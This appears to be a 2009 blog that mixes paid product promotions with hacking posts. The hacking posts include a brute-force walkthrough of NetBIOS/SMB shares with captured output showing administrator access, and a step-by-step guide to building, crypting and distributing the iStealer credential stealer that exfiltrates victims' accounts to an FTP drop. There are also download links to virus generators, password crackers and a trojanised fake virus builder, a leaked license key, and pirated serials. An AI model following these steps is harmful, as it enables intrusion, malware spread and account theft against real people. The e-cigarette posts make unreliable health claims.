- registration key: 3X6Z24NBYE29747U95QAE76PWRL347KP42KWC75U8S7WAA3CRG8QRSD9BNDE9W9LXW8P78STGXSKJURZ84Y5AM5YNVKA43WNR8DRKE
4. If the license key is valid, after you copy and paste the license information (email and registration key) into the registration form and press OK or Register, you should see that your copy is registered. You will also see your email address and license expiration date.
5. If you see this information then the registration process is completed.
For any technical problem please do not hesitate to contact our support team at this e-mail address: E-mail.
AllAnonymity Team
---------------------------------------------------------------------------
Hope you will enjoy your six months key!
http://rapidshare.com/files/214338187/iphider37se.exe
Website Defacing Tools
Posted at Wednesday, November 04, 2009No 7 E Cigarettes Wholesale Site
Posted at Tuesday, October 27, 2009Looking for an international wholesaler of electronic cigarette products site? If so you can find No 7 E Cigarettes from SS Choice LLC at site No7ECigarettes.com. They are happy to serve customers abroad. If you are interested in this innovative product, you can now purchase the E Cigarette Wholesale. Shop for electronic cigarette, buy wholesale electronic cigarettes cartridges, source electronic cigars, e-pipes at wholesale prices. They have reviewed and sourced the best electric cigarettes for you to choose from.
Due to the consumption of cigarettes continues to increase, SS Choice LLC offers electronic cigarettes without fire, tar, carbon monoxide, and ash. American-made cigarettes is offering the sensation of smoking without the health risks arising from conventional cigarettes. Sensation is felt no different from conventional cigarettes. Electronic cigarette is an alternative to smoking is the most healthy.
Electronic cigarette that use rechargeable battery have the form in a small pipe made of stainless steel and contains a series of electronic components. The circuit is connected to the inhaler and smoking liquid container, which will produce an evaporation which is inhaled by the smoker. Evaporation of liquid smoking it will work automatically based on wind pressure switch so there is suction from smokers.
No7ECigarettes.com now cover many countries for bulk wholesale such as E-Cigarettes Austria, E-Cigarettes Belgium, E-Cigarettes Brazil, and many more. If you are living in these regions, you can submit your order at No7ECigarettes.com to get wholesale prices. You can contact them if you want to ask anything about this product by phone to sales division toll free: 1-(877)-497-3299 ext. 1 hours: 9:00 AM - 5:00 PM Mon - Fri or customer service division toll free: 1-(877)-771-5196 Ext. 2 hours: 12:00 PM - 5:00 PM Mon - Fri or through mailing address: SS Choice, LLC. PO Box 1631 Colleyville, TX 76034.
EccoMailbox.com Sell Ecco Mailboxes Online
Posted at Monday, October 26, 2009If you need an unique mailbox in the front of your house then ecco mailbox from EccoMailbox.com is the right answer. The EccoMailbox.com has been producing ecco mailboxes to fulfill the desire of us. They provide unique mailboxes such as the ecco wall mount mailbox. Update your boring mailbox with something more exiting! Available in a variety of metallic finishes, this ecco wall mount mailbox has a transitional and understated design created to enhance any entrance. Available in six classic metal finishes complimenting some of today's most popular hardware selections.
At EccoMailbox.com you will find in-depth product information as they research materials, manufacturing methods, and quality techniques of all their chosen vendors. EccoMailbox.com is the best source for ecco mailboxes. With their heavily discounted prices, free shipping on mailboxes, and full service customer service dept, they are the leading source for homeowners and businesses who want an ecco mailbox upgrade. You may choose so many kinds of the mailboxes such as ecco e4 mailbox, or the upgrade version such as ecco e6 mailbox, ecco e7 mailbox, and ecco e8 mailbox.
EccoMailbox dedicated to producing functional, well made and tasteful ecco mailboxes for the home and for everyday living, EccoMailbox strives to create designs that are original and timeless with lasting value and quality. When you place your order today, you'll get your item quickly, so you can enjoy it as soon as possible. They understand that shipping costs can be an issue when it comes to the items they sell. That's why they offer free or low-cost shipping on nearly every item they stock.
EccoMailbox is SSL Certified, meaning they offer secure communications by encrypting all your data. EccoMailbox.com uses a safe and secure online ordering system that protects your privacy every step of the way. So enjoy safe, secure shopping. Visit the site and purchase your ecco mailbox today!
Torrentbit.nl Provides Download Torrent
Posted at Tuesday, October 20, 2009Do you ever using torrent? If not, I want to suggest you to use this download method. Why torrent? Because with this protocol it free to share files with friends without any restriction, and we can also get the nice thing files than regular download. Torrent is a peer to peer so the more people who have a same file, which makes it quick download torrent. Meanwhile, if only 2 people who upload large files, it will less rapidly the download.
Torrent also allowing you to download files quickly by allowing people downloading the file to upload (distribute) parts of it at the same time. Torrent is often used for distribution of very large files, very popular files and files available for free, as it is a lot cheaper, faster and more efficient to distribute files using Torrent than a regular download.
If you want to direct download torrent files, you may need the hash of these files. This is a small metadata file. Metadata here means that the file contains information about the data you want to download, not the data itself. You can get the hash of these files from site Torrentbit.nl. They came on public as a torrent indexing site. They provide the most comfortable and handy service for user, everything else is a question of minor importance. You won`t meet annoying popups and popunders on their site, you won`t see disgusting porn banners.
Their torrent download indexing site is user-friendly interface. At Torrentbit.nl they have several unique features are included such as SSL encrypted secure torrent downloading, categorized torrent search, torrent forum with requests, and torrent blog with downloads. Here you can choose whatever category you want. They have many categries such Movies, Anime / Hentai, Music, Games, Books, Apps, Series / TV Shows, Pictures, Other, Adult, and iPod.
Introduce the best SQL injection Tools
Posted at Saturday, October 17, 2009
According to my experiences, I think these are good tools for SQL injection :
ADSQL
Code:
http://rapidshare.com/files/112453410/how_...tion_points.rar
Code:
http://seclab.nosec.org/pangolin_bin.rar
http://www.nosec.org/web/index.php?q=pangolin
NetBIOS Attack Methods
Posted at Saturday, October 17, 2009NetBIOS Attack Methods
This NetBIOS attack technique was verified on Windows 95, NT 4.0 Workstation, NT 4.0 Server, NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, Windows 98 beta 2.1. One of the components being used is NAT.EXEA discussion of the tool, it switches, and common techniques follows:
NAT.EXE [-o filename] [-u userlist] [-p passlist]
Switches:
-o Specify the output file. All results from the scan
will be written to the specified file, in addition
to standard output.
-u Specify the file to read usernames from. Usernames
will be read from the specified file when attempt-
ing to guess the password on the remote server.
Usernames should appear one per line in the speci-
fied file.
-p Specify the file to read passwords from. Passwords
will be read from the specified file when attempt-
ing to guess the password on the remote server.
Passwords should appear one per line in the speci-
fied file.
Addresses should be specified in comma deliminated
format, with no spaces. Valid address specifica-
tions include:
hostname - "hostname" is added
127.0.0.1-127.0.0.3, adds addresses 127.0.0.1
through 127.0.0.3
127.0.0.1-3, adds addresses 127.0.0.1 through
127.0.0.3
127.0.0.1-3,7,10-20, adds addresses 127.0.0.1
through 127.0.0.3, 127.0.0.7, 127.0.0.10 through
127.0.0.20.
hostname,127.0.0.1-3, adds "hostname" and 127.0.0.1
through 127.0.0.1
All combinations of hostnames and address ranges as
specified above are valid.
[8.0.1] Comparing NAT.EXE to Microsoft's own executables
[8.0.2] First, a look at NBTSTAT
First we look at the NBTSTAT command. This command was discussed in earlier portions of the book ( [5.0.6] The Nbtstat Command ). In this section, you will see a demonstration of how this tool is used and how it compares to other Microsoft tools and non Microsoft tools.
What follows is pretty much a step by step guide to using NBTSTAT as well as extra information. Again, if youre interested in more NBSTAT switches and functions, view the [5.0.6] The Nbtstat Command portion of the book.
C:\nbtstat -A XXX.XX.XXX.XX
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
STUDENT1 <20> UNIQUE Registered
STUDENT1 <00> UNIQUE Registered
DOMAIN1 <00> GROUP Registered
DOMAIN1 <1C> GROUP Registered
DOMAIN1 <1B> UNIQUE Registered
STUDENT1 <03> UNIQUE Registered
DOMAIN1 <1E> GROUP Registered
DOMAIN1 <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
MAC Address = 00-C0-4F-C4-8C-9D
Here is a partial NetBIOS 16th bit listing:
Computername <00> UNIQUE workstation service name
<00> GROUP domain name
Server <20> UNIQUE Server Service name
Computername <03> UNIQUE Registered by the messenger service. This is the computername
to be added to the LMHOSTS file which is not necessary to use
NAT.EXE but is necessary if you would like to view the remote
computer in Network Neighborhood.
Username <03> Registered by the messenger service.
Domainname <1B> Registers the local computer as the master browser for the domain
Domainname <1C> Registers the computer as a domain controller for the domain
(PDC or BDC)
Domainname <1D> Registers the local client as the local segments master browser
for the domain
Domainname <1E> Registers as a Group NetBIOS Name
<06> RAS Server
<1F> Net DDE
<21> RAS Client
[8.0.3] Intro to the NET commands
The NET command is a command that admins can execute through a dos window to show information about servers, networks, shares, and connections. It also has a number of command options that you can use to add user accounts and groups, change domain settings, and configure shares. In this section, you will learn about these NET commands, and you will also have the outline to a NET command Batch file that can be used as a primitive network security analysis tool. Before we continue on with the techniques, a discussion of the available options will come first:
[8.0.4] Net Accounts: This command shows current settings for password, logon limitations, and domain information. It also contains options for updating the User accounts database and modifying password and logon requirements.
[8.0.5] Net Computer: This adds or deletes computers from a domains database.
[8.0.6] Net Config Server or Net Config Workstation: Displays config info about the server service. When used without specifying Server or Workstation, the command displays a list of configurable services.
[8.0.7] Net Continue: Reactivates an NT service that was suspended by a NET PAUSE command.
[8.0.8] Net File: This command lists the open files on a server and has options for closing shared files and removing file locks.
[8.0.9] Net Group: This displays information about group names and has options you can use to add or modify global groups on servers.
[8.1.0] Net Help: Help with these commands
[8.1.1] Net Helpmsg message#: Get help with a particular net error or function message.
[8.1.2] Net Localgroup: Use this to list local groups on servers. You can also modify those groups.
[8.1.3] Net Name: This command shows the names of computers and users to which messages are sent on the computer.
[8.1.4] Net Pause: Use this command to suspend a certain NT service.
[8.1.5] Net Print: Displays print jobs and shared queues.
[8.1.6] Net Send: Use this command to send messages to other users, computers, or messaging names on the network.
[8.1.7] Net Session: Shows information about current sessions. Also has commands for disconnecting certain sessions.
[8.1.8] Net Share: Use this command to list information about all resources being shared on a computer. This command is also used to create network shares.
[8.1.9] Net Statistics Server or Workstation: Shows the statistics log.
[8.2.0] Net Stop: Stops NT services, cancelling any connections the service is using. Let it be known that stopping one service, may stop other services.
[8.2.1] Net Time: This command is used to display or set the time for a computer or domain.
[8.2.2] Net Use: This displays a list of connected computers and has options for connecting to and disconnecting from shared resources.
[8.2.3] Net User: This command will display a list of user accounts for the computer, and has options for creating a modifying those accounts.
[8.2.4] Net View: This command displays a list of resources being shared on a computer. Including netware servers.
[8.2.5] Special note on DOS and older Windows Machines: The commands listed above are available to Windows NT Servers and Workstation, DOS and older Windows clients have these NET commands available:
Net Config
Net Diag (runs the diagnostic program)
Net Help
Net Init (loads protocol and network adapter drivers.)
Net Logoff
Net Logon
Net Password (changes password)
Net Print
Net Start
Net Stop
Net Time
Net Use
Net Ver (displays the type and version of the network redirector)
Net View
For this section, the command being used is the NET VIEW and NET USE commands.
[8.2.6] Actual NET VIEW and NET USE Screen Captures during a hack.
C:\net view XXX.XX.XXX.XX
Shared resources at XXX.XX.XXX.XX
Share name Type Used as Comment
------------------------------------------------------------------------------
NETLOGON Disk Logon server share
Test Disk
The command completed successfully.
NOTE: The C$ ADMIN$ and IPC$ are hidden and are not shown.
C:\net use /?
The syntax of this command is:
NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]]
[/USER:[domainname\]username]
[[/DELETE] | [/PERSISTENT:{YES | NO}]]
NET USE [devicename | *] [password | *]] [/HOME]
NET USE [/PERSISTENT:{YES | NO}]
C:\net use x: \\XXX.XX.XXX.XX\test
The command completed successfully.
C:\unzipped\nat10bin>net use
New connections will be remembered.
Status Local Remote Network
-------------------------------------------------------------------------------
OK X: \\XXX.XX.XXX.XX\test Microsoft Windows Network
OK \\XXX.XX.XXX.XX\test Microsoft Windows Network
The command completed successfully.
Here is an actual example of how the NAT.EXE program is used. The information listed here is an actual capture of the activity. The IP addresses have been changed to protect, well, us.
C:\nat -o output.txt -u userlist.txt -p passlist.txt XXX.XX.XX.XX-YYY.YY.YYY.YY
[*]--- Reading usernames from userlist.txt
[*]--- Reading passwords from passlist.txt
[*]--- Checking host: XXX.XX.XXX.XX
[*]--- Obtaining list of remote NetBIOS names
[*]--- Attempting to connect with name: *
[*]--- Unable to connect
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Mon Dec 01 07:44:34 1997
[*]--- Timezone is UTC-6.0
[*]--- Remote server wants us to encrypt, telling it not to
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
[*]--- Obtained server information:
Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]
[*]--- Obtained listing of shares:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk: Remote Admin
C$ Disk: Default share
IPC$ IPC: Remote IPC
NETLOGON Disk: Logon server share
Test Disk:
[*]--- This machine has a browse list:
Server Comment
--------- -------
STUDENT1
[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$
[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
[*]--- Checking write access in: \\*SMBSERVER\C$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$
[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON
[*]--- Attempting to access share: \\*SMBSERVER\Test
[*]--- WARNING: Able to access share: \\*SMBSERVER\Test
[*]--- Checking write access in: \\*SMBSERVER\Test
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test
[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
[*]--- Unable to access
If the default share of Everyone/Full Control is active, then you are done, the server is hacked. If not, keep playing. You will be surprised what you find out.
The Easiest & Most Effective Hacking Method [iStealer 3.0]
Posted at Saturday, October 17, 2009The Easiest & Most Effective Hacking Method [iStealer 3.0]
1.ISTEALER 3.0
2.CRYPTER
3.DRIVEHQ ACCOUNT
all UPLOADS contain the same password.
Password Code:
barcode@inwarez.org
Step 1:
Click the "Drivehq Account" link above, fill in the blank spaces with proper details as you will have to verify the account. Create the account and verify it, write down the details for later reference.
Step 2:
Click the "iStealer 3.0" link above. Download the .zip to a folder or your desktop.
Step 3:
Extract the folder to your desktop, you will be prompted for a password, that can be found below.
Password: barcode@inwarez.org
Step 4:
Open the folder, inside you will find a subfolder and the iStealer executable program. Open the .exe.
Fill in the blanks with the information of your drivehq account you made earlier, make sure the same boxes are ticked and leave the black area alone.
Step 5:
Once your FTP details are filled in, click the "Test FTP" button.
Step 6:
If your FTP is working fine then continue to build the iStealer server by pressing the "Build" button, you will be prompted to save the file. Save it to your desktop, name it whatever you want. If your FTP test was not successfull then please check the details and try again, alternatively post here.
Step 7:
Click the "Crypter" link above and download it to your desktop. Extract it as you previously did with the iStealer. Open the crypter which in this case is BRM Crypt as it is the least detected public one available. First click Add and select the .exe you previously built with the iStealer, you will then be prompted to "Encrypt this file?" click yes.
Step 8:
Ignore all of the steps about file cloning and icon changing, however if you want you can choose to use an error message. Finally, navigate to the "More Settings" tab and press the "Build" button. This will be your final .exe so feel free to name it whatever you want and save it to a place you find fit.
Step 9:
You are now done! All that is left is to distribute the Crypted .exe you made. As this tutorial is for educational purposes only I cannot tell you that you can get a shit load of Rapidshare accounts using this method, so up yours crackers.
Step 10:
Once people have downloaded your crypted stealer, you want to check the logs for any accounts. All you have to do is go to http://www.drivehq.com/file/ShowFolderFrame.aspx? and login. There should be a list of the computers you have infected, the file name will be something like "AdminPC-22832323" which is the name of the PC followed by some random number. What you need to do now is click on the file and inside will be a list of accounts for you to enjoy!!
ACheapSeat.com: Get Easiness in Buying Tickets
Posted at Friday, October 16, 2009Looking for Bank Of America Theatre Tickets? Do you want to get easiness in buying tickets? If so you can try buying tickets online. It is much easier than standing in line. You don't have to spend the night in a long line only to find out that the tickets are sold out by the time you get there. There is a site that allow you to easily purchase tickets. ACheapSeat.com is the right place to get premium seating to events. A Cheap Seat is a professional ticket broker with access to many events across the country.
ACheapSeat.com has lists hundreds of events and the site is easy to navigate. They take major credit cards such as MasterCard and Visa and American Express and Discover. Buying through the site is secure. You should never buy directly from the seller. It could be a scam and you could end up losing your money without getting any tickets. The site guarantees your money is safe. You can purchase pre-sale tickets to ensure that you get to see the shows you want to see. You can be assured of the best possible prices for the tickets as well. All Tickets are shipped with Fedex. A Seating Chart is available for most events. See where you will be sitting when you make your purchase!
ACheapSeat.com has been in the business for years. Their exclusive access to hard to find event tickets makes them a valuable ally to have on your side when you really need tickets but you have to consider that you will pay far more than you really want to for tickets. ACheapSeat.com is the right broker that makes buying tickets easy and secure. ACheapSeat.com offer better prices and dependable service because they’ve been around long enough to streamline the brokering process.
If you need Chicago Bears Tickets and Philadelphia Eagles Tickets don't hesitate to buying online at ACheapSeat.com, they provide you with the hottest deals on premium tickets every day.
Get Everything with E-Cigarette Starter Kit Bundles
Posted at Wednesday, October 14, 2009If you want to try to quit smoking there is a good alternative tool that can help you. E cigarettes are a complete alternative to tobacco cigarettes. An e cigarette contains a taste of tobacco but none of the harmful substances found in normal cigarettes allowing smokers cravings to be satisfied without inhaling the many dangerous toxins.
The e cigarette is a battery powered atomizer. When it is placed in the mouth, a small processor detects airflow and injects a small amount of fluid from a propylene glycol/nicotine cartridge into the atomizer which vaporizes the liquid. In essence, the electronic cigarette looks and behaves like a regular cigarette but delivers nicotine without dangerous by-products such as arsenic, carbon monoxide and tar. By simulating normal smoking, without the harmful side effects, the electronic cigarette could be a stepping stone to a successfully quit smoking program.
If you make the smart choice without putting yourself or loved ones in the danger zone of tobacco based cigarettes, start with starter kit bundles from ECigarettesChoice.com, a full service e cigarette retailer and wholesaler. This is where you will always find the best value e cigarette starter kit bundles online. Get everything you need to get started right away with e cigarette starter kit bundles, these refillable e cigarettes are a complete alternative to tobacco cigarettes. You will find traditional e-cigarettes, pen-style e-cigarette, e-cigars, e-pipes all right here! Most kits include 1 atomizer, 2 batteries, 1 battery charger, 5 pack of cartridges and easy to follow instructions.
ECigarettesChoice.com provide e cigarettes from popular brands such SS Choice, Gamucci, NJOY, and Smoking Everywhere. ECigarettesChoice.com also provide e cigarette batteries so you can replace your e cigarette battery if needed. It's important to note that, when you smoke the E-Cigarette, the tip of the cigarette also light up, not by flame but via an LED. If you need more information about E Cigarette don't hestate to visit ECigarettesChoice.com.
IntegraScan: Get Background Check & Criminal Records
Posted at Sunday, October 11, 2009Do you find yourself in need of a business partner? Are you need their criminal history? If so, look no further than IntegraScan. Through site IntegraScan.com they provide online instant criminal records and background check system. A criminal background check is a tremendous resource for business owners, no matter what type of business you might operate. In addition, while the use of these tools does come with a price, you will find that the small cost is well worth the number of benefits that you are able to enjoy with criminal background check providers.
The wrong choice in business partners can find you the victim of embezzlement and fraud, as well as other problems. On the other hand, if you do conduct a criminal records search, you can avoid this potential pitfall and ensure that you are able to bring on the help that you so desperately need. However, if you fail to conduct a criminal records search on a potential business partner, you can find numerous other problems facing your business.
A criminal records search could have shown you that the investor had charges placed against him or her for fraud, or for breaking a contract. In addition, while a criminal records search certainly allows you to view the criminal history of the person in question, it will also show you other information, such as their credit history. This can be a powerful tool when determining if a potential investor has the ability to benefit you financially.
You can also check their address through Po Box Search or through their physical address features at IntegraScan. You can reverse trace a PO Box to it's owner and their physical address. By knowing their criminal record it can helps enhance productivity and profitability on your business.
How to use AccessDiver - find logins on many sites-WORKS!
Posted at Friday, September 25, 2009This summary is not available. Please click here to view the post.
BEST TOOLS EVER (UPDATED)
Posted at Friday, September 25, 2009BEST TOOLS EVER (UPDATED)
Open VPN
OpenVPN is a full-featured SSL VPN solution which can accomodate a wide range of configurations, including remote access, site-to-site VPNs, WiFi security, and enterprise-scale remote access solutions with load balancing, failover, and fine-grained access-controls. GUI-version for Windows!
http://uploading.com/files/GTWU6PHX/open...l.zip.html
BlueFTP
This is an old tool which will helps you to hack mobiles throw bluetooth. Try it by yourself.
http://uploading.com/files/KTR3ONRF/BlueFTP.zip.html
DELmE's Batch Virus Generator v1.0
This tool is a virus creater. It will create very proffesional virus. Never test any virus on your PC. Very effective for bad hackers. All credits go to DELmE
http://uploading.com/files/CS02T8P6/DELm...1.rar.html
DELmE's Batch Virus Generator v2.0
This tool is a virus creater. It will create very proffesional virus. I would say it is best virus creater i have ever saw. Never test any virus on your PC. Very effective for bad hackers. All credits go to DELmE
http://uploading.com/files/0BPU0ZCP/DELm...0.rar.html
Windows command list
This is a list for most of the windows operator commands. It can very useful for virus programmers.
http://uploading.com/files/SG3CU3V8/wind...t.rar.html
THC-Hydra 5.4
This tool is a really good one to hack websites.This tool supports: TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC,RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable, LDAP2 and Cisco AAA. It is worth to try it.
http://uploading.com/files/WWZGWNJG/hydr...n.zip.html
John the ripper
This tool is should crack password
http://uploading.com/files/S06PAFJJ/john171w.zip.html
Rainbowcrack 1.2
This tool will helps you to crack the PC users and administartors passwords. This is really good. Tutorial on how to use it is included.
http://uploading.com/files/5R4T4YPI/rain...n.zip.html
Konboot
This tool should recover your lost passwords for your PCs users accounts. This is an iso file so you have to burn it on a CD so it works. Work for Windows/Linux
http://uploading.com/files/7VQ5MFN4/pass...o.zip.html
For more information
Firefox Master Password Remover
This tool will remove the Master password on firefox. I create it and test it on my PC and works fine. I got this idea since i saw many people begging for master password on their firefox browser. Very effective
http://uploading.com/files/7KII7524/Fire...r.rar.html
Rapidshare Points Generator v2.4
This tool should generate points for your rapidshare accounts. Clean but not test it. Try it and let us know if it works
http://uploading.com/files/K2IC5Z4G/Rapi...4.rar.html
Icon changer
I noticed that some people asking for ful version icon changer. I couldn't bring the full version but i bring this. A very simple tool to add/remove icons for any application. It is shareware.
http://uploading.com/files/TG37XPXE/Icon...r.rar.html
Icons Extract
The Icons Extract utility scans the files and folders on your computer, and extract the icons and cursors stored in EXE, DLL, OCX, CPL, and in other file types. You can save the extracted icons to ICO files (or CUR files for cursors), or copy the image of a single icon into the clipboard. Very useful
http://uploading.com/files/XDHT9FPG/icon...r.zip.html
XSS_Scanner_1.0
This tool have been posted twice before but looks it is lost in the forum so i took the initiative to post it in my list. This tool will scan the web using google and will search for vulnerable XSS website.
http://uploading.com/files/HU7BBAYR/XSS_...0.zip.html
k9 web protection
This tool will let you control your browsers by control what types of websites to block or what particulary websites to block. It is very effective for parental control to limit what there children can access including hacking . Also ability to protect from infected websites. A full list of websites already exist. Very effective
http://uploading.com/files/7RVR98TU/k9%2...n.rar.html
72389 Mass Bomber
This tool will let you to send messages to multiple emails from a signle email at the same time. very effective. All credit go to Nathan72389
http://uploading.com/files/PS93X57M/7238...r.rar.html
Nsis 2.45
This contain some really good scripts that can be used in your websites and ability to create the script you want. Very good for java writers
http://uploading.com/files/F0CY0R6K/nsis...g.rar.html
Password door
This tool will helps you to restrict access to applications installed on your PC. This tool will put a password that you choose on the application that you choose so no one can open it without a password. Very effective
http://uploading.com/files/SL389H3D/Pass...r.rar.html
Security administrator
This tool will give control on all tasks that all user account have. Block what you don't want them to have as tasks and options eg: block downloading
http://uploading.com/files/Z497IJSP/Secu...r.zip.html
L337 Virus Creator
This tool is a fake virus generator. It looks like a virus generator while in fact it will infect the person himself. Use it to trick your victims. Let them think they can create virus using this one while they will get infected once they press any button. NEVER EVER test it on yourself. It will infect you. All credits go to Right Hand Man.
Code:
http://i275.photobucket.com/albums/jj299/s...titled-1-18.jpg
http://uploading.com/files/7KO7NNNW/L337...r.rar.html
Password generator 2.02
This tool will create complex passwords that you choose the type of the password and ability to personalize the person.
http://uploading.com/files/SQ1FGMAQ/PWGen-2.02.rar.html
Dork list
This is a list for some of the most used dorks in hacking websites.
http://uploading.com/files/7LVF2XEF/Dork...t.rar.html
Avast Virus removal pro v4
This is one of the best virus removal if not the best. It will search for virus on your system and remove them. Very effective
http://uploading.com/files/XPZGHUNA/Avas...4.rar.html
Password Zilla
This is the best password generator i have ever saw in my life. It will create the most complex and complicated passwords in the world. Choose the format of your password and what caracters to use and let it work. Also this tool can crack hashes. I am in love with this tool. My msn was hacked twice but a third time when i used a password generated by this one. Very effective
http://uploading.com/files/PKLLKB3V/Pass...a.rar.html
WinRar Password Remover v1.1
This tool will crack any protected winrar files.
http://uploading.com/files/PEXJGFBY/WinR...1.rar.html
GroundZero's Account Freezer V1.0
This tool will freeze facebook accounts.All credits go to GroundZero
http://uploading.com/files/TGKRE72N/Grou...0.zip.html
Tutorial
LC4
One of the most proffesional windows password crackers. very useful
http://uploading.com/files/H1M3LOB3/LC4.rar.html
1 million serials
This have been posted before and i think it is damn good that it shouldn't be lost with the other files. It will provide you with serials for over 1 million software.
http://uploading.com/files/CFO0UES9/1.Mi...s.rar.html
Forum auto poster
This was posted before in the forum but his owner was quicked out the forum.This tool will helps you to auto post in multiple forums in very few and easy steps.
http://uploading.com/files/J4U3KXUC/foru...r.rar.html
Autorun pro entreprise
This is the best autorun maker i have ever saw. It is damn pro. It can be very useful making your virus to autorun.
http://uploading.com/files/E24WUTUH/Auto...e.rar.html
File renamer
This tool will remane a very big number of files and folders at the same in only few clicks. Pro hackers can use this one to mess victims system.
http://uploading.com/files/S795U2M2/File...r.rar.html
Cheat Engine 55
This tool will helps to hack different things including flash games.
http://uploading.com/files/ZMJOZEIC/Chea...5.exe.html
Tutorial
Alpha editor
Alpha Editor is a Windows based text editor designed to make the creation and use of batch files by administrators easier. Alpha editor includes built in coding for login script creation.
http://uploading.com/files/C52TN3VM/Alph...r.zip.html
CSS Maker
Create stylesheets with no CSS knowledge! Don´t worry about the german intro, language can be adjusted in the program...;) very useful for websites writers
http://uploading.com/files/2R3S5TW0/CSS%...r.zip.html
Scour 2.3.7
I know that many people use scour.com to gain money and that they are getting tireds doing the searches by themself.This tool was posted before in the forum. Use theis tool to automate the searches on scour.com. Jsut input your informations in "Settings.ini" file and you are ready to use it and to win money.
http://uploading.com/files/W1WEC4NL/Scou...7.rar.html